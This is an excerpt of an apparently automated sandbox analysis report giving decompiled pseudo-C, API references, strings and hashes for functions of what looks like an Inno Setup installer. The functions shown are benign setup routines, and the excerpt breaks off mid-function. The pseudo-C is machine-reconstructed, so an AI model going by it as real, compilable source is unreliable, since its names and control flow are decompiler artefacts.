0x00000000
0x004530b6
0x004530c5
0x004530d1
0x00000000
0x00000000
0x004530c7
0x004530c7
0x00000000
0x004530c7
0x004530c5
0x00000000
0x004530ac
0x004530f0
0x004530fa
0x004530fa
0x00453103
0x0045311a
0x00453105
0x0045310b
0x0045310b
0x00453125
0x00453132
0x0045313a
0x00453141
0x00453149
0x0045314a
0x00453155
0x0045315c
0x0045315e
0x00453164
0x00453164
0x00453181
0x0045316b
0x00453171
0x00453176
0x0045317c
0x0045317c
0x0045318f
0x00453192
0x00453195
0x0045319d
0x004531aa
0x004531aa
0x00452f75
0x00452f75
0x00452f77
0x00452f79
0x00452f7a
0x00000000
0x00452f7c
0x00452f7c
0x00452f7d
0x00452f7d
0x00452f7d
0x00452f81
0x00452f82
0x00452f83
0x00452f86
0x00452f89
0x00452f8e
0x00452f96
0x00452f9d
0x00452f9e
0x00452fa3
0x00452fa6
0x00452faf
0x00452fba
0x00452fc3
0x00452fcb
0x00452fd6
0x00452fd6
0x00452fc3
0x00000000

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453053

Strings

MoveFileEx, xrefs: 00453263
.tmp, xrefs: 0045300F
WININIT.INI, xrefs: 00453001
NUL, xrefs: 00453115
%nI, xrefs: 00453090, 004530A0, 004530D3, 0045316B, 00453176, 0045315E
[rename], xrefs: 004530B6, 004530F2
\nI, xrefs: 00453294, 0045300B, 00453076, 0045300E

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID: %nI$.tmp$MoveFileEx$NUL$WININIT.INI$[rename]$\nI
API String ID: 390214022-3388891449
Opcode ID: 09635d2a7e6092836aa5088eef5768839e850328579b8eae4fbb37692966dea2
Instruction ID: 0b0dcec983e824be328fc5c0ac23dd21dd4b303354c37382b4da753e4e763837
Opcode Fuzzy Hash: 09635d2a7e6092836aa5088eef5768839e850328579b8eae4fbb37692966dea2
Instruction Fuzzy Hash: 80911130E002099BDB01EFA5D942BDEB7B5EF49346F508467F800B7292D778AE49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0047F9E4 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 170
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0047F9E4(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr* _t30;
				intOrPtr* _t32;
				intOrPtr* _t34;
				intOrPtr* _t36;
				intOrPtr _t42;
				struct HWND__* _t51;
				struct HINSTANCE__* _t55;
				struct HINSTANCE__* _t57;
				intOrPtr* _t59;
				intOrPtr* _t62;
				signed int _t63;
				intOrPtr* _t66;
				intOrPtr* _t69;
				signed int _t70;
				intOrPtr _t75;
				intOrPtr _t81;
				intOrPtr _t83;
				void* _t87;
				void* _t89;
				void* _t90;
				intOrPtr _t106;
				void* _t109;
				void* _t112;
				intOrPtr _t114;
				intOrPtr _t116;
				void* _t121;
				void* _t123;
				void* _t124;
				intOrPtr _t125;

				_t143 = __fp0;
				_t117 = __edi;
				_t91 = __ecx;
				_t123 = _t124;
				_t125 = _t124 + 0xfffffff4;
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_t87 = __eax;
				_push(_t123);
				_push(0x47fc34);
				_push( *[fs:eax]);
				 *[fs:eax] = _t125;
				E00456B58("Deinitializing Setup.", __eax, __ecx, __edi, __esi);
				if( *0x49b3b8 != 0) {
					_t128 = _t87;
					if(_t87 != 0) {
						_push(_t123);
						_push(0x47fa5f);
						_push( *[fs:eax]);
						 *[fs:eax] = _t125;
						_t81 =  *0x49b3b0; // 0x0
						_v12 = 0;
						_v8 = 0xb;
						_t83 =  *0x49b3b8; // 0x22901cc
						 *0x49b3b0 = E0049308C(_t83,  &_v12, "GetCustomSetupExitCode", _t128, __fp0, _t81, 0, 0);
						_pop(_t116);
						 *[fs:eax] = _t116;
					}
					_push(_t123);
					_push( *[fs:eax]);
					 *[fs:eax] = _t125;
					_v12 = 0;
					_v8 = 0xb;
					_t75 =  *0x49b3b8; // 0x22901cc
					E00492F08(_t75,  &_v12, "DeinitializeSetup", _t128, _t143, 0, 0);
					_pop(_t114);
					_t91 = 0x47fab6;
					 *[fs:eax] = _t114;
					E0042E284(0x49b3b8);
				}
				_t30 =  *0x49b394; // 0x2267b00
				_t120 =  *((intOrPtr*)( *_t30 + 0x10))() - 1;
				if(_t120 >= 0) {
					_t121 = _t120 + 1;
					_t90 = 0;
					do {
						_t66 =  *0x49b394; // 0x2267b00
						_t117 =  *_t66;
						 *((intOrPtr*)( *_t66 + 0xc))();
						_t69 =  *0x49b394; // 0x2267b00
						_t91 =  *_t69;
						_t70 =  *((intOrPtr*)( *_t69 + 0x14))(_v16);
						_pop(_t112);
						E00451C68(_t70 & 0xffffff00 | _t70 != 0x00000000, _t112, _t70);
						_t90 = _t90 + 1;
						_t121 = _t121 - 1;
					} while (_t121 != 0);
				}
				_t32 =  *0x49b394; // 0x2267b00
				 *((intOrPtr*)( *_t32 + 0x38))();
				_t34 =  *0x49b398; // 0x2267b2c
				_t89 =  *((intOrPtr*)( *_t34 + 0x10))() - 1;
				if(_t89 >= 0) {
					do {
						_t59 =  *0x49b398; // 0x2267b2c
						_t120 =  *_t59;
						 *((intOrPtr*)( *_t59 + 0xc))();
						_t62 =  *0x49b398; // 0x2267b2c
						_t91 =  *_t62;
						_t63 =  *((intOrPtr*)( *_t62 + 0x14))(_v16);
						_pop(_t109);
						E00452170(_t63 & 0xffffff00 | _t63 != 0x00000000, _t109, _t63);
						_t89 = _t89 - 1;
					} while (_t89 != 0xffffffff);
				}
				_t36 =  *0x49b398; // 0x2267b2c
				_t105 =  *_t36;
				 *((intOrPtr*)( *_t36 + 0x38))();
				E0046C0FC();
				if( *0x49b438 != 0) {
					_t57 =  *0x49b438; // 0x10000000
					FreeLibrary(_t57);
				}
				if( *0x49b434 != 0) {
					_t55 =  *0x49b434; // 0x0
					FreeLibrary(_t55);
				}
				E0047B6F4();
				E0047B3C8(_t89, _t91, _t105, _t117, _t120);
				if( *0x49b377 != 0 &&  *0x49afac != 0) {
					E00456B58("Not restarting Windows because Setup is being run from the debugger.", _t89, _t91, _t117, _t120);
					 *0x49b377 = 0;
				}
				E004560D8();
				_t42 =  *0x49a628; // 0x2262410
				E0042E9A0( *((intOrPtr*)(_t42 + 0x20)));
				if( *0x49b377 != 0) {
					E00456B58("Restarting Windows.", _t89, _t91, _t117, _t120);
					if( *0x49b09c == 0) {
						E0047D1C0(_t89, _t117, _t120);
					} else {
						_t51 =  *0x49b0a0; // 0x4023c
						SendNotifyMessageA(_t51, 0x496, 0x2710, 0);
					}
				}
				_pop(_t106);
				 *[fs:eax] = _t106;
				_push(E0047FC3B);
				return E00403400( &_v16);
			}

0x0047f9e4
0x0047f9e4
0x0047f9e4
0x0047f9e5
0x0047f9e7
0x0047f9eb
0x0047f9ec
0x0047f9ef
0x0047f9f2
0x0047f9f6
0x0047f9f7
0x0047f9fc
0x0047f9ff
0x0047fa07
0x0047fa13
0x0047fa19
0x0047fa1b
0x0047fa1f
0x0047fa20
0x0047fa25
0x0047fa28
0x0047fa2f
0x0047fa37
0x0047fa3a
0x0047fa46
0x0047fa50
0x0047fa57
0x0047fa5a
0x0047fa5a
0x0047fa81
0x0047fa87
0x0047fa8a
0x0047fa93
0x0047fa96
0x0047faa2
0x0047faa7
0x0047faae
0x0047fab0
0x0047fab1
0x0047fadb
0x0047fadb
0x0047fae0
0x0047faec
0x0047faef
0x0047faf1
0x0047faf2
0x0047faf4
0x0047faf9
0x0047fafe
0x0047fb00
0x0047fb09
0x0047fb0e
0x0047fb10
0x0047fb18
0x0047fb19
0x0047fb1e
0x0047fb1f
0x0047fb1f
0x0047faf4
0x0047fb22
0x0047fb29
0x0047fb2c
0x0047fb38
0x0047fb3c
0x0047fb3e
0x0047fb43
0x0047fb48
0x0047fb4a
0x0047fb53
0x0047fb58
0x0047fb5a
0x0047fb62
0x0047fb63
0x0047fb68
0x0047fb69
0x0047fb3e
0x0047fb6e
0x0047fb73
0x0047fb75
0x0047fb78
0x0047fb84
0x0047fb86
0x0047fb8c
0x0047fb8c
0x0047fb98
0x0047fb9a
0x0047fba0
0x0047fba0
0x0047fba5
0x0047fbaa
0x0047fbb6
0x0047fbc6
0x0047fbcb
0x0047fbcb
0x0047fbd2
0x0047fbd7
0x0047fbdf
0x0047fbeb
0x0047fbf2
0x0047fbfe
0x0047fc19
0x0047fc00
0x0047fc0c
0x0047fc12
0x0047fc12
0x0047fbfe
0x0047fc20
0x0047fc23
0x0047fc26
0x0047fc33

APIs

FreeLibrary.KERNEL32(10000000), ref: 0047FB8C
FreeLibrary.KERNEL32(00000000), ref: 0047FBA0
SendNotifyMessageA.USER32(0004023C,00000496,00002710,00000000), ref: 0047FC12

Strings

Restarting Windows., xrefs: 0047FBED
Deinitializing Setup., xrefs: 0047FA02
GetCustomSetupExitCode, xrefs: 0047FA41
DeinitializeSetup, xrefs: 0047FA9D
Not restarting Windows because Setup is being run from the debugger., xrefs: 0047FBC1

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FreeLibrary$MessageNotifySend
String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
API String ID: 3817813901-1884538726
Opcode ID: fd87d62e27bbd5ad1802fc1cb9c23d7a23efbb6ece23d81b8f02e01494254c99
Instruction ID: 9ffe1a3aa36bc1da07962e74fbe0428a8ad47268e51de0cdffd592ca9caa3035
Opcode Fuzzy Hash: fd87d62e27bbd5ad1802fc1cb9c23d7a23efbb6ece23d81b8f02e01494254c99
Instruction Fuzzy Hash: 5451AF30600204DFD721DF69E985B9A77E4FB59714F50807BEC08C73A1DB38A849CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00460A30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00460A30(void* __eax, void* __ebx, struct _browseinfo __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags, char _a4) {
				intOrPtr* _v8;
				char _v9;
				char _v16;
				char _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				struct _ITEMIDLIST* _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v52;
				char* _v56;
				struct _browseinfo _v64;
				char _v324;
				intOrPtr _t49;
				void* _t59;
				intOrPtr _t67;
				struct _browseinfo _t70;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t68 = __edi;
				_t72 = _t73;
				_t74 = _t73 + 0xfffffdbc;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_t70 = __ecx;
				_v8 = __edx;
				_t59 = __eax;
				_push(_t72);
				_push(0x460bbf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v9 = 0;
				E0042CB64( *_v8, __ecx,  &_v16, __eflags);
				_push( &_v20);
				L0042CC50();
				if(E0042CC28( &_v20) != 0) {
					_v20 = 0;
				}
				E00402934( &_v64, 0x20);
				_v64 = _t70;
				_v56 =  &_v324;
				_v52 = E00403738(_t59);
				_v48 = 0x41;
				if(_a4 == 0) {
					_v48 = _v48 | 0x00000200;
				}
				_v44 = E004609CC;
				if(_v16 != 0) {
					_v40 = E00403738(_v16);
				}
				_v24 = GetActiveWindow();
				_v28 = E0041EE8C(0, _t59, _t68, _t70);
				_push(0);
				L0042CBD0();
				_push(_t72);
				_push(0x460b34);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v32 = SHBrowseForFolder( &_v64);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x460b3b);
				L0042CBD8();
				E0041EF40(_v28);
				_t49 =  *0x49a628; // 0x2262410
				SetActiveWindow( *(_t49 + 0x20));
				return SetActiveWindow(_v24);
			}

0x00460a30
0x00460a31
0x00460a33
0x00460a39
0x00460a3a
0x00460a3b
0x00460a3e
0x00460a41
0x00460a43
0x00460a46
0x00460a4a
0x00460a4b
0x00460a50
0x00460a53
0x00460a56
0x00460a62
0x00460a6a
0x00460a6b
0x00460a77
0x00460a7b
0x00460a7b
0x00460a88
0x00460a8d
0x00460a96
0x00460aa0
0x00460aa3
0x00460aae
0x00460ab0
0x00460ab0
0x00460ab7
0x00460ac2
0x00460acc
0x00460acc
0x00460ad4
0x00460ade
0x00460ae1
0x00460ae3
0x00460aea
0x00460aeb
0x00460af0
0x00460af3
0x00460aff
0x00460b04
0x00460b07
0x00460b0a
0x00460b0f
0x00460b17
0x00460b1c
0x00460b25
0x00460b33

APIs

SHGetMalloc.SHELL32(?), ref: 00460A6B
GetActiveWindow.USER32 ref: 00460ACF
CoInitialize.OLE32(00000000), ref: 00460AE3
SHBrowseForFolder.SHELL32(?), ref: 00460AFA
7677F460.OLE32(00460B3B,00000000,?,?,?,?,?,00000000,00460BBF), ref: 00460B0F
SetActiveWindow.USER32(?,00460B3B,00000000,?,?,?,?,?,00000000,00460BBF), ref: 00460B25
SetActiveWindow.USER32(?,?,00460B3B,00000000,?,?,?,?,?,00000000,00460BBF), ref: 00460B2E

Strings

A, xrefs: 00460AA3

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ActiveWindow$7677BrowseF460FolderInitializeMalloc
String ID: A
API String ID: 1633443074-3554254475
Opcode ID: a1abc3331e6b094623e386f66bc876b60dabd5cc0da0584f97b83fc861c4bca7
Instruction ID: 6285945bf07c3a166b022f531d05f3a803eb355dac7221229df2d15ab139dc55
Opcode Fuzzy Hash: a1abc3331e6b094623e386f66bc876b60dabd5cc0da0584f97b83fc861c4bca7
Instruction Fuzzy Hash: 283132B0D00308AFDB00EFE6D885A9EBBF8EB09704F51847AF404E7251E7785A44CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00471610 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00471610(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				signed int _t38;
				intOrPtr _t45;
				CHAR* _t52;
				void* _t54;
				intOrPtr _t57;

				_push(0);
				_push(0);
				_push(0);
				_push(__edi);
				_t54 = __eax;
				_push(_t57);
				_push(0x4716d1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t57;
				_t38 = GetFileAttributesA(E00403738(__eax));
				if(_t38 != 0xffffffff && (_t38 & 0x00000010) != 0) {
					E0042C520(_t54,  &_v8, "desktop.ini");
					E0042CD38(".ShellClassInfo", _t38, 0, "CLSID2", __edi, _t54,  &_v12, _v8);
					if(E00406AA4(_v12, "{0AFACED1-E828-11D1-9187-B532F1E9575D}") == 0) {
						E00406F30(_v8);
						E0042C520(_t54,  &_v16, "target.lnk");
						E00406F30(_v16);
						_t52 = E00403738(_t54);
						SetFileAttributesA(_t52, _t38 & 0xfffffffe);
						RemoveDirectoryA(_t52);
					}
				}
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(0x4716d8);
				return E00403420( &_v16, 3);
			}

0x00471613
0x00471615
0x00471617
0x0047161b
0x0047161c
0x00471620
0x00471621
0x00471626
0x00471629
0x00471639
0x0047163e
0x0047164f
0x00471668
0x0047167c
0x00471681
0x00471690
0x00471698
0x004716a8
0x004716ab
0x004716b1
0x004716b1
0x0047167c
0x004716b8
0x004716bb
0x004716be
0x004716d0

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,004716D1,?,?,?,00000008,00000000,00000000,00000000,?,0047192D,?,?,00000000,00471B94), ref: 00471634

Part of subcall function 0042CD38: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CDAE

Part of subcall function 00406F30: DeleteFileA.KERNEL32(00000000,0049A628,004969ED,00000000,00496A42,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F3B

SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,004716D1,?,?,?,00000008,00000000,00000000,00000000,?,0047192D), ref: 004716AB
RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,004716D1,?,?,?,00000008,00000000,00000000,00000000), ref: 004716B1

Strings

{0AFACED1-E828-11D1-9187-B532F1E9575D}, xrefs: 0047166D
.ShellClassInfo, xrefs: 00471663
CLSID2, xrefs: 0047165E
target.lnk, xrefs: 00471689
desktop.ini, xrefs: 00471648

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
API String ID: 884541143-1710247218
Opcode ID: 118db7c4a699b9e05438b54c3da0c19d7c5c5fd5fb50eb8630513c9711acac34
Instruction ID: c39d6c4db2ad0deae7f1ae965f2db77ee18d80f30206d7cf633db21ebbe3cc69
Opcode Fuzzy Hash: 118db7c4a699b9e05438b54c3da0c19d7c5c5fd5fb50eb8630513c9711acac34
Instruction Fuzzy Hash: EA11DD703001147BDB11E6AE9C82A9EB3ACDF45714FA0823BF404A72E1DB3C9E02865D

Uniqueness

Uniqueness Score: -1.00%

Function 00401A90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00401A90() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t18;
				intOrPtr _t22;
				intOrPtr _t24;

				_t22 = _t24;
				if( *0x49a419 == 0) {
					return _t2;
				} else {
					_push(_t22);
					_push(E00401B68);
					_push( *[fs:edx]);
					 *[fs:edx] = _t24;
					if( *0x49a036 != 0) {
						_push(0x49a420);
						L00401328();
					}
					 *0x49a419 = 0;
					_t3 =  *0x49a478; // 0x772b70
					LocalFree(_t3);
					 *0x49a478 = 0;
					_t18 =  *0x49a440; // 0x77099c
					while(_t18 != 0x49a440) {
						VirtualFree( *(_t18 + 8), 0, 0x8000);
						_t18 =  *_t18;
					}
					E00401390(0x49a440);
					E00401390(0x49a450);
					E00401390(0x49a47c);
					_t14 =  *0x49a438; // 0x770368
					while(_t14 != 0) {
						 *0x49a438 =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x49a438; // 0x770368
					}
					_pop( *[fs:0x0]);
					_push(0x401b6f);
					if( *0x49a036 != 0) {
						_push(0x49a420);
						L00401330();
					}
					_push(0x49a420);
					L00401338();
					return _t14;
				}
			}

0x00401a91
0x00401a9b
0x00401b71
0x00401aa1
0x00401aa3
0x00401aa4
0x00401aa9
0x00401aac
0x00401ab6
0x00401ab8
0x00401abd
0x00401abd
0x00401ac2
0x00401ac9
0x00401acf
0x00401ad6
0x00401adb
0x00401af5
0x00401aee
0x00401af3
0x00401af3
0x00401b02
0x00401b0c
0x00401b16
0x00401b1b
0x00401b22
0x00401b26
0x00401b2d
0x00401b32
0x00401b37
0x00401b3b
0x00401b45
0x00401b51
0x00401b53
0x00401b58
0x00401b58
0x00401b5d
0x00401b62
0x00401b67
0x00401b67

APIs

RtlEnterCriticalSection.KERNEL32(0049A420,00000000,00401B68), ref: 00401ABD
LocalFree.KERNEL32(00772B70,00000000,00401B68), ref: 00401ACF
VirtualFree.KERNEL32(?,00000000,00008000,00772B70,00000000,00401B68), ref: 00401AEE
LocalFree.KERNEL32(00770368,?,00000000,00008000,00772B70,00000000,00401B68), ref: 00401B2D
RtlLeaveCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B58
RtlDeleteCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B62

Strings

Lw, xrefs: 00401B11
p+w, xrefs: 00401AC9, 00401AD6

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID: Lw$p+w
API String ID: 3782394904-2978669739
Opcode ID: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
Instruction ID: 4ef907ce7de5879ae286245a644ba6b68361dc01c28fd2a698a6758b772d8c96
Opcode Fuzzy Hash: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
Instruction Fuzzy Hash: C9114270A403405AEB15AB659C89B263BE597A570CF54407BF80067AF2D7BC5860C7EF

Uniqueness

Uniqueness Score: -1.00%

Function 0045C650 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045C650(struct HINSTANCE__* __eax) {
				intOrPtr _t6;
				struct HINSTANCE__* _t7;

				_t7 = __eax;
				 *0x49b028 = GetProcAddress(__eax, "inflateInit_");
				 *0x49b02c = GetProcAddress(_t7, "inflate");
				 *0x49b030 = GetProcAddress(_t7, "inflateEnd");
				 *0x49b034 = GetProcAddress(_t7, "inflateReset");
				if( *0x49b028 == 0 ||  *0x49b02c == 0 ||  *0x49b030 == 0 ||  *0x49b034 == 0) {
					_t6 = 0;
				} else {
					_t6 = 1;
				}
				if(_t6 == 0) {
					 *0x49b028 = 0;
					 *0x49b02c = 0;
					 *0x49b030 = 0;
					 *0x49b034 = 0;
					return _t6;
				}
				return _t6;
			}

0x0045c651
0x0045c65e
0x0045c66e
0x0045c67e
0x0045c68e
0x0045c69a
0x0045c6b7
0x0045c6bb
0x0045c6bb
0x0045c6bb
0x0045c6bf
0x0045c6c3
0x0045c6cb
0x0045c6d3
0x0045c6db
0x00000000
0x0045c6db
0x0045c6e2

APIs

GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045C659
GetProcAddress.KERNEL32(00000000,inflate), ref: 0045C669
GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045C679
GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045C689

Strings

inflateEnd, xrefs: 0045C673
inflateReset, xrefs: 0045C683
inflateInit_, xrefs: 0045C653
inflate, xrefs: 0045C663

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc
String ID: inflate$inflateEnd$inflateInit_$inflateReset
API String ID: 190572456-3516654456
Opcode ID: 6381b77caea71f7d8be91453f376269dc5ade138e8b0f1742c8e2d2bc3e4b903
Instruction ID: 0597597a11baf9d9df8e8dc309d43f89446d1c2781f93ec2c5acf252f3f21a6e
Opcode Fuzzy Hash: 6381b77caea71f7d8be91453f376269dc5ade138e8b0f1742c8e2d2bc3e4b903
Instruction Fuzzy Hash: BF012CB0901300DEDB14DF32BEC573736A5E7A871AF14A03B9824692A2D77C054CCE6C

Uniqueness

Uniqueness Score: -1.00%

Function 0041A8C4 Relevance: 13.7, APIs: 9, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A8C4(intOrPtr* __eax, intOrPtr __ecx, int* __edx, intOrPtr _a4, int* _a8) {
				intOrPtr _v8;
				long _v12;
				int _v16;
				int _v20;
				void* __edi;
				void* __ebp;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr _t70;
				void* _t71;
				void* _t74;
				long _t77;
				intOrPtr _t89;
				long _t115;
				intOrPtr _t120;
				intOrPtr* _t138;
				intOrPtr* _t140;
				intOrPtr _t144;
				int* _t146;
				intOrPtr _t150;
				intOrPtr _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				int* _t160;
				intOrPtr* _t162;

				_t147 = __ecx;
				_v8 = __ecx;
				_t146 = __edx;
				_t162 = __eax;
				_t160 = _a8;
				if(_v8 != 0) {
					 *((intOrPtr*)( *__eax + 0x10))();
					_v16 = _t160[2] -  *_t160;
					_v20 = _t160[3] - _t160[1];
					_t150 =  *0x41aac0; // 0x1
					E0041B150(__eax, __ecx, _t150, _t160);
					if( *0x49853c == 0) {
						 *0x49853c = E0041CD0C(1);
						_t144 =  *0x49853c; // 0x0
						E0041D84C(_t144, 1);
					}
					_t66 =  *0x49853c; // 0x0
					if( *((intOrPtr*)( *_t66 + 0x20))() < _v16) {
						_t140 =  *0x49853c; // 0x0
						_t147 =  *_t140;
						 *((intOrPtr*)( *_t140 + 0x2c))();
					}
					_t68 =  *0x49853c; // 0x0
					_t152 =  *_t68;
					if( *((intOrPtr*)( *_t68 + 0x1c))() < _v20) {
						_t152 = _v20;
						_t138 =  *0x49853c; // 0x0
						_t147 =  *_t138;
						 *((intOrPtr*)( *_t138 + 0x28))();
					}
					_t70 =  *0x49853c; // 0x0
					_t71 = E0041D0B8(_t70, _t147, _t152);
					_t153 =  *0x41aac0; // 0x1
					E0041B150(_t71, _t147, _t153, _t160);
					_t74 = E0041D0B8(_v8, _t147, _t153);
					_t154 =  *0x41aac0; // 0x1
					E0041B150(_t74, _t147, _t154, _t160);
					_t77 = E0041A040(_a4);
					_v12 = SetBkColor( *(E0041D0B8(_v8, _t147, _t154) + 4), _t77);
					_t89 =  *0x49853c; // 0x0
					L00405B94();
					SetBkColor( *(E0041D0B8(_v8, _t147, _t154) + 4), _v12);
					_t155 =  *0x41aac4; // 0x9
					E0041B150(_t162, _t147, _t155, _t160);
					StretchBlt( *(_t162 + 4),  *_t146, _t146[1], _t146[2] -  *_t146, _t146[3] - _t146[1],  *(E0041D0B8(_v8, _t147, _t155) + 4),  *_t160, _t160[1], _v16, _v20, 0xcc0020);
					_t115 = SetTextColor( *(_t162 + 4), 0);
					_v12 = SetBkColor( *(_t162 + 4), 0xffffff);
					_t120 =  *0x49853c; // 0x0
					StretchBlt( *(_t162 + 4),  *_t146, _t146[1], _t146[2] -  *_t146, _t146[3] - _t146[1],  *(E0041D0B8(_t120, _t147, _t155) + 4), 0, 0, _v16, _v20, 0xe20746);
					SetTextColor( *(_t162 + 4), _t115);
					SetBkColor( *(_t162 + 4), _v12);
